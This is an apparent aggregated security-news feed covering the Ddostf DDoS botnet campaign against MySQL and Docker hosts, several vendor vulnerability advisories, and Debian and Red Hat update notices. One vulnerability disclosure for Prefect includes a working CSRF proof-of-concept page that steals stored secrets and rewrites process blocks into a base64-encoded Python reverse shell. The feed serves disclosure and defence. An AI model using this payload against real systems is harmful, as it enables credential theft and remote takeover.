By Deeba Ahmed
The Ddostf Botnet was initially identified in 2016.
This is a post from HackRead.com Read the original post: Ddostf Botnet Resurfaces in DDoS Attacks Against MySQL and Docker Hosts

Researchers claim that the Chinese Ddostf botnet is specifically designed for launching DDoS attacks and that the threat actors are operating a DDoS-for-hire service.

AhnLab Security Emergency Response Center (ASEC) researchers have shared alarming **details** of a new campaign targeting MySQL servers and Docker hosts with DDoS malware.

AhnLab noted that attacks targeting MySQL servers on Windows systems have increased sharply, and vulnerable servers are infected with the Chinese botnet Ddostf, **discovered** in 2016.

Researchers claim that this malware is specifically designed for launching DDoS attacks and that the threat actor is operating a **DDoS-for-hire service**.

According to the AESC blog post, threat actors scan for exploitable MySQL servers. After compromising the servers, threat actors install the Ddostf DDoS botnet to launch distributed denial-of-service (DDoS) attacks against other servers.

**MySQL servers** are a common target in such campaigns because of their widespread use in Windows and Linux environments. Although MS-SQL is a preferred database service for Windows users, MySQL servers are also commonly used on Windows, which makes the systems running them a prime target for cybercriminals.

Based on data from AhnLab’s Smart Defense (ASD) logs, most malware targeting vulnerable MySQL servers were **Gh0st RAT** variants, but instances of **AsyncRAT** were also observed and recently, there’s been an uptick in the use of the Ddostf botnet.

Ddostf is a powerful malware that copies itself with a random name in the %SystemRoot% directory and registers as a service before decrypting the encrypted C2 server URL string to connect to the attackers’ server. It can collect system data and transfer it to the C2 server. Then it waits for specific commands (e.g., SYN, UDP, and HTTP GET/POST floods) to launch the **DDoS attacks**.

The botnet is unique because it can connect to a new address from the C2 server and execute commands there for a limited time. This helps the Ddostf botnet operator to infect multiple systems and sell DDoS attacks as a service. Ddostf can target Linux and Windows systems because of supports both ELF and PE formats and can achieve persistence. 

Attackers first scan for publicly accessible systems using port 3306/TCP and after accessing the server (those with known vulnerabilities or weak credentials), they use brute-force or dictionary attacks on the system.

If the system has signs of poor credential management, attackers can gain access to administrator account credentials. If the system runs an **unpatched version with vulnerabilities**, attackers can exploit them to execute commands without needing these processes. Unlike MS-SQL, which entails direct OS command execution methods, MySQL relies on UDFs (User-Defined Functions) that can allow threat actors to execute commands.

They can also install malicious UDF DLLS on infected MySQL servers and execute commands. Like CLR Stored Procedure WebShell work, these DLLs can provide threat actors complete control of the infected system. In the case of the Ddostf DDoS bot, attackers use the UDF malware as a tool to install it on poorly managed MySQL servers.

Database servers get frequently targeted because of poorly managed account credentials. Administrators must use strong passwords apart from applying the latest patches to protect their servers. Firewalls can be used to restrict access to external actors, and a DDoS mitigation service can help protect against **large-scale attacks**.

****_RELATED ARTICLES_****

1.  **Who Killed the Mozi IoT Zombie Botnet – India or China?**
2.  **Chinese APT Posing as Cloud Services to Spy on Cambodia**
3.  **Dark.IoT & Custom Botnets Exploit Zyxel Flaw in DDoS Attacks**
4.  **How Chinese Hackers Stole Signing Key to Breach Outlook Accounts**
5.  **Chinese Scammers Exploit Cloned Websites in Vast Gambling Network**

Ddostf Botnet Resurfaces in DDoS Attacks Against MySQL and Docker Hosts

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.0 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.0 and earlier allows a attacker to log in to the product may execute an arbitrary command.



**Multiple vulnerabilities in EXPRESSCLUSTER X**

Number:NV23-009  
CVE:CVE-2023-39544, CVE-2023-39545, CVE-2023-39546, CVE-2023-39547, CVE-2023-39548

**Overview**

EXPRESSCLUSTER X WebManager/Cluster WebUI contains multiple vulnerabilities.

Missing Authorization(CVE-2023-39544)  
Files or Directories Accessible to External Parties(CVE-2023-39545)  
Authentication Bypass(CVE-2023-39546)  
Improper Authentication(CVE-2023-39547)  
Unrestricted Upload of File with Dangerous Type(CVE-2023-39548)

**Products Affected**

**EXPRESSCLUSTER X**

**Affected Version**

EXPRESSCLUSTER X 1.0 for Windows  
EXPRESSCLUSTER X 2.0 for Windows  
EXPRESSCLUSTER X 2.1 for Windows  
EXPRESSCLUSTER X 3.0 for Windows  
EXPRESSCLUSTER X 3.1 for Windows  
EXPRESSCLUSTER X 3.2 for Windows  
EXPRESSCLUSTER X 3.3 for Windows  
EXPRESSCLUSTER X 4.0 for Windows  
EXPRESSCLUSTER X 4.1 for Windows  
EXPRESSCLUSTER X 4.2 for Windows  
EXPRESSCLUSTER X 4.3 for Windows  
EXPRESSCLUSTER X 5.0 for Windows

EXPRESSCLUSTER X SingleServerSafe 1.0 for Windows  
EXPRESSCLUSTER X SingleServerSafe 2.0 for Windows  
EXPRESSCLUSTER X SingleServerSafe 2.1 for Windows  
EXPRESSCLUSTER X SingleServerSafe 3.0 for Windows  
EXPRESSCLUSTER X SingleServerSafe 3.1 for Windows  
EXPRESSCLUSTER X SingleServerSafe 3.2 for Windows  
EXPRESSCLUSTER X SingleServerSafe 3.3 for Windows  
EXPRESSCLUSTER X SingleServerSafe 4.0 for Windows  
EXPRESSCLUSTER X SingleServerSafe 4.1 for Windows  
EXPRESSCLUSTER X SingleServerSafe 4.2 for Windows  
EXPRESSCLUSTER X SingleServerSafe 4.3 for Windows  
EXPRESSCLUSTER X SingleServerSafe 5.0 for Windows

EXPRESSCLUSTER X 1.0 for Linux  
EXPRESSCLUSTER X 2.0 for Linux  
EXPRESSCLUSTER X 2.1 for Linux  
EXPRESSCLUSTER X 3.0 for Linux  
EXPRESSCLUSTER X 3.1 for Linux  
EXPRESSCLUSTER X 3.2 for Linux  
EXPRESSCLUSTER X 3.3 for Linux  
EXPRESSCLUSTER X 4.0 for Linux  
EXPRESSCLUSTER X 4.1 for Linux  
EXPRESSCLUSTER X 4.2 for Linux  
EXPRESSCLUSTER X 4.3 for Linux  
EXPRESSCLUSTER X 5.0 for Linux  
EXPRESSCLUSTER X 5.1 for Linux

EXPRESSCLUSTER X 1.0 SingleServerSafe for Linux  
EXPRESSCLUSTER X 2.0 SingleServerSafe for Linux  
EXPRESSCLUSTER X 2.1 SingleServerSafe for Linux  
EXPRESSCLUSTER X 3.0 SingleServerSafe for Linux  
EXPRESSCLUSTER X 3.1 SingleServerSafe for Linux  
EXPRESSCLUSTER X 3.2 SingleServerSafe for Linux  
EXPRESSCLUSTER X 3.3 SingleServerSafe for Linux  
EXPRESSCLUSTER X 4.0 SingleServerSafe for Linux  
EXPRESSCLUSTER X 4.1 SingleServerSafe for Linux  
EXPRESSCLUSTER X 4.2 SingleServerSafe for Linux  
EXPRESSCLUSTER X 4.3 SingleServerSafe for Linux  
EXPRESSCLUSTER X 5.0 SingleServerSafe for Linux  
EXPRESSCLUSTER X 5.1 SingleServerSafe for Linux

**Solution**

**References**

**Credit**

reported by Mr. David Levard in Videotron for NEC-PSIRT

**Update**

CVE-2023-39548: NVNV23-009_en: セキュリティ情報 | NEC

A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-6176: cve-details

An attacker is able to steal secrets and potentially gain remote code execution via CSRF using the Prefect API.

**Description**

If you are running the dashboard locally there is no csrf/cors/no auth and therefore you are vulnerable to cross site request forgeries. Worse yet, the service is almost certainly at 127.0.0.1:4200, reducing any need for recon or brute force. CSRF/cors/lack of auth is also likely to be a issue on self hosted instances based on the lack of documentation about how to configure auth to function similar to the cloud version.

**Proof of Concept**

    <!doctype html>
    
    <html lang="en">
    
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Prefect cross site request POC</title>
        <meta name="author" content="Joshua Bonnett">
        <meta property="og:title" content="Prefect cross site request POC">
        <meta property="og:description" content="A simple poc for prefect block data extraction ">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
    </head>
    
    <body>
        <hr />
        <h1> Stolen Block content:</h1>
        <div class="block_content"> </div>
        <h1> Stolen Artifact content:</h1>
        <hr />
        <div class="artifacts"> </div>
        <hr />
        <h1> Stolen variable content:</h1>
        <hr />
        <div class="vars"> </div>
        <hr />
        <h1> Notes:</h1>
        Note that this wasn't sent anywhere, but it easily could have been sent with a second post to a server of my
        choosing, and it need not be on its own page, it could be in a ad, 10 iframes deep on a common watering hole site.
    
        Recommendation: actually enforce csrf header requirements, get rid of the "include_secrets" api flag.
        <script>
    
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.block_content').html(y));
    
            fetch("http://127.0.0.1:4200/api/artifacts/latest/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.artifacts').html(y));
            fetch("  http://127.0.0.1:4200/api/variables/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.text()).then(y => $('div.vars').html(y));
    
            //***** Find process blocks and change them****//
            fetch("http://127.0.0.1:4200/api/block_documents/filter", {
                "headers": {
                    "accept": "application/json, text/plain, */*",
                    "content-type": "application/json",
                },
                "body": "{\"include_secrets\":true}",
                "method": "POST",
                "mode": "cors",
            }).then(x => x.json()).then(function (data) {
                data.forEach(element => {
                    if (element.block_type.name == "Process") {
                        fetch("http://127.0.0.1:4200/api/block_documents/" + element.id, {
                            "headers": {
                                "accept": "application/json, text/plain, */*",
                                "accept-language": "en-US,en;q=0.9",
                                "cache-control": "no-cache",
                                "content-type": "application/json",
                                "pragma": "no-cache",
                                "sec-ch-ua-mobile": "?0",
                                "sec-ch-ua-platform": "\"Linux\"",
                                "sec-fetch-dest": "empty",
                                "sec-fetch-mode": "cors",
                                "sec-fetch-site": "same-origin",
                                "sec-gpc": "1",
                                "x-prefect-ui": "true"
                            },
                            "referrer": "http://127.0.0.1:4200/blocks/block/e3129574-2094-4411-a685-5c327a0201df/edit",
                            "body": "{\"data\":{\"command\":[\"python\", \"-c\", \"import base64,sys;exec(base64.b64decode(sys.argv[1]))\", \"aW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMTI3LjAuMC4xIiw5MDAxKSk7W29zLmR1cDIocy5maWxlbm8oKSxmKWZvciBmIGluKDAsMSwyKV07cHR5LnNwYXduKCJzaCIp\"], \"stream_output\":true}, \"merge_existing_data\":false}",
                            "method": "PATCH"
                        });
                    }
                });
            });
        </script>
    </body>
    
    </html>
    

**Impact**

Stealing or changing secrets from blocks(example: aws creds, azur cred blocks) Stealing or changing variables inputs from blocks/variables(example: remote file block,) Stealing any output data from artifacts(Example: output from ml runs)

Reverse shell is possible by changing any existing Process blocks to a reverse shell (set to localhost port 9001 in the Poc, but I could have it connect back over the internet), triggers when a flow that uses that block runs. I could add code to trigger a quick run on all flows to ensure connect back shell happens immediately but I leave that to the reader.

A very similar effect could happen within the docker container, Azure Container Instance Job, ECS Task, GCP Cloud Run Job and Kubernetes Job blocks if they are configured. I didn't include them in the poc because of the complexity of setting them up in my dev env, but adapting the poc to each of these block types would be very simple.

I would recommend moving the configuration of those block types into flow code where it isnt updateable from the web, and it can be managed like code.

**Occurrences**

server.py L560

It is worth setting some limits in cors by default, it is a shame to have the middleware but have it wide open.

block\_documents.py L80

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

block\_documents.py L52

Letting the api read block secrets just by asking for them with no extra auth really isn't ideal. Server should enforce visibility rather than leaving it to the request

CVE-2023-6022: Can use csrf to steal/modify block content, artifact content, variables possibly leading to RCE when the dashboard is running on a developers workstation in prefect

An out-of-bounds read vulnerability was found in the NVMe-oF/TCP subsystem in the Linux kernel. This flaw allows a remote attacker to send a crafted TCP packet, triggering a heap-based buffer overflow that results in kmalloc data to be printed (and potentially leaked) to the kernel ring buffer (dmesg).

CVE-2023-6121: cve-details

Debian Linux Security Advisory 5556-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5556-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonNovember 15, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-5997 CVE-2023-6112Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 119.0.6045.159-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 119.0.6045.159-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmVVT/UACgkQZF0CR8NudjfQZw//bJoI/QaSlCksKVM/OBj1flTAddPBNLyLxnxhIgRFk8hAWKXZfncSMt7PRfnkbzEHMxWjPmCFf3G1MnpHxI8TEMD9Ry8mmTQ/ZwZd04JYUQ6bGHKmCh6EwT/ipFpw76Xaym/CfCsrSVa+z7VclQ+S8KumbGknuJN87H0SyxwaP2khP/T/c9v1IY2qq5tJLYOAKMN+Sadex9U3+kjHScx3bBBD8OJ/PGV16X+NxctQ0bdQPVfTlXbmkiQhMnp8c4bxkgNNFV0W1AlYzUWPcIyDgJjcuR0lowEUGkT0awq23HavlA50abiUYDVP15RBkY75c0eyB4/UgP71UjUHvm23ztcaozNl0/YIUVvqMF47toydCEkrUzv6jRBCQVkAeMd3y1CQMYu/CF0U7uwrElelAVxVo0Al24G1fbjAdS5xTHe8TOJg1s5e0uts38kUzT0ESj8a0D3swjnt8AHkrJQN6bN4x9PinZPTQN9gLKdbw9vDaWOhAx3VWdfl2Pscscu+18B3GbCWtZE904rPyb6vRrHYTtCHMSzxPCrvKVSjoI28zawXhJY+eDY6Tepm6ewP2AG3oRc9/8RhBDaEnUAz+Dd4GyTTv260a2N5xnZyfuiIRv/DR0M1jhzTuJQokpfxzXQwxvgS9oMwW9WAZWJWfug7nPKuSruHbLzKlHheqKI==eZ05-----END PGP SIGNATURE-----

Debian Security Advisory 5556-1

Debian Linux Security Advisory 5555-1 - Two vulnerabilities were discovered in openvpn, a virtual private network application which could result in memory disclosure or denial of service.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5555-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
November 15, 2023                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openvpn  
CVE ID         : CVE-2023-46849 CVE-2023-46850

Two vulnerabilities were discovered in openvpn, a virtual private  
network application which could result in memory disclosure or denial  
of service.

   The oldstable distribution (bullseye) is not affected.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.6.3-1+deb12u2.

We recommend that you upgrade your openvpn packages.

For the detailed security status of openvpn please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openvpn

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVVGAAACgkQEMKTtsN8  
TjZneg//bSgv5wdYUyFUWMI0hIYO/uV7bSCpUoJa6RG7BlPQ5zihVq6kw5MA+Dq2  
psZYDGcQZwM7Dne+bYChAFBL7+QrXLANLrZVHKyOeA5gRpDvlquGNR4D3ZloMVIt  
xdWpmHPAutHdWdTifZ390toJCWKKZTPRvxrohiirHVIQH03VYCFCupJYyZTFMOes  
vfz1t6wPoiAGlPvAkMXBHzCPAkRjOcz6S01V/dQPQbvo6oW9MNHCT+Upfj0M74rV  
Z9v8fpbnXzonoNoIDm7YQud+fIEDIr63m2kB0M31qO8jdWsvLrBgtseX6VO5Ni03  
UBeDAPTId8foPomxvhvl/8jcoMF/u3N3tivR2n9pV3vZKN1c08cH2vYnlal2Q9i+  
5W2EDoshUKHbMznmDsB98ByOglVK671mAyyb5ycfb3deXnpYX3fDWSBCBBBzKTgX  
W7xSSK0gFb/GLaHl7vmK4bjKv0qrTBDlEX+d84lI6f+zYwOBFyU+u3fITyKPCMp8  
SqPUfdNg77Ijco7YKZdofi9U549uqqKW8dT5HMZglo8yG1H8w/7LFG+Df8hZ+dp4  
qJQ7tYBEZP8J4XlY1btaPE6F9JKqZSkvUW5jPmFNzfU/Apb0b0dvnfFRr0/BhkFL  
0fYxClI1C61qRavE+mqYjt1o9+IwZdS6tBxReZG15D+XoMvdFf0=  
=8EOr  
-----END PGP SIGNATURE-----

Debian Security Advisory 5555-1

Red Hat Security Advisory 2023-7294-01 - An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7294.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kernel security updateAdvisory ID:        RHSA-2023:7294-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7294Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-3609====================================================================Summary: An update for kernel is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The kernel packages contain the Linux kernel, the core of any Linux operating system.Security Fix(es):* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)* kernel: net/sched: cls_fw component can be exploited as result of failure in tcf_change_indev function (CVE-2023-3776)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3609References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2225097https://bugzilla.redhat.com/show_bug.cgi?id=2225201

Red Hat Security Advisory 2023-7294-01

Red Hat Security Advisory 2023-7279-01 - An update for open-vm-tools is now available for Red Hat Enterprise Linux 7. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7279.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: open-vm-tools security updateAdvisory ID:        RHSA-2023:7279-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7279Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-34058====================================================================Summary: An update for open-vm-tools is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines.Security Fix(es):* open-vm-tools: SAML token signature bypass (CVE-2023-34058)* open-vm-tools: file descriptor hijack vulnerability in the vmware-user-suid-wrapper (CVE-2023-34059)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-34058References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2246080https://bugzilla.redhat.com/show_bug.cgi?id=2246096

Red Hat Security Advisory 2023-7279-01

Red Hat Security Advisory 2023-7277-01 - An update for open-vm-tools is now available for Red Hat Enterprise Linux 9. Issues addressed include a bypass vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_7277.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: open-vm-tools security updateAdvisory ID:        RHSA-2023:7277-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:7277Issue date:         2023-11-15Revision:           01CVE Names:          CVE-2023-34058====================================================================Summary: An update for open-vm-tools is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Open Virtual Machine Tools are the open source implementation of the VMware Tools. They are a set of guest operating system virtualization components that enhance performance and user experience of virtual machines.Security Fix(es):* open-vm-tools: SAML token signature bypass (CVE-2023-34058)* open-vm-tools: file descriptor hijack vulnerability in the vmware-user-suid-wrapper (CVE-2023-34059)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-34058References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2246080https://bugzilla.redhat.com/show_bug.cgi?id=2246096

Tag

#linux